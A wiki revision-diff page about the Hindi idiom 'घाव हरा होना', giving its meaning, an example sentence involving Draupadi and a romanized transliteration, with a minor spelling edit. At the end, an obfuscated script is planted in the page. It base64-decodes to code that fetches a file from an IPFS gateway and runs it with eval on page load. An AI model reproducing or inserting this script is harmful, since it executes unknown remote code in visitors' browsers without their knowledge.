Difference between revisions of "घाव हरा होना"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - " दुख " to " दु:ख ")
Line 1: Line 1:
 
'''घाव हरा होना''' एक प्रचलित [[कहावत लोकोक्ति मुहावरे|लोकोक्ति]] अथवा [[हिन्दी]] मुहावरा है।
 
'''घाव हरा होना''' एक प्रचलित [[कहावत लोकोक्ति मुहावरे|लोकोक्ति]] अथवा [[हिन्दी]] मुहावरा है।
  
'''अर्थ'''- कष्ट या दुख की घड़ी याद आना और फलतः वही पुराना कष्ट या दुख अनुभूत करना।
+
'''अर्थ'''- कष्ट या दु:ख की घड़ी याद आना और फलतः वही पुराना कष्ट या दु:ख अनुभूत करना।
  
 
'''प्रयोग'''- पाँचालों के राज्य में स्वयंबर के अवसर पर [[द्रौपदी]] ने मेरे स्वाभिमानी मन पर जो प्रहार किया था, उसका घाव अब भी ज्यों का त्यों ताजा था। (ओम शिवराज)
 
'''प्रयोग'''- पाँचालों के राज्य में स्वयंबर के अवसर पर [[द्रौपदी]] ने मेरे स्वाभिमानी मन पर जो प्रहार किया था, उसका घाव अब भी ज्यों का त्यों ताजा था। (ओम शिवराज)

Revision as of 14:01, 2 June 2017

ghav hara hona ek prachalit lokokti athava hindi muhavara hai.

arth- kasht ya du:kh ki gh di yad ana aur phalatah vahi purana kasht ya du:kh anubhoot karana.

prayog- paanchaloan ke rajy mean svayanbar ke avasar par draupadi ne mere svabhimani man par jo prahar kiya tha, usaka ghav ab bhi jyoan ka tyoan taja tha. (om shivaraj)

tika tippani aur sandarbh

sanbandhit lekh

kahavat lokokti muhavare varnamala kramanusar khojean

a   a    i    ee    u    oo    e    ai    o   au    aan    k   kh    g    gh    ch    chh    j    jh    t    th    d   dh    t    th    d    dh    n    p    ph    b    bh    m    y    r    l    v    sh    sh    s    h    ksh    tr    shr

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>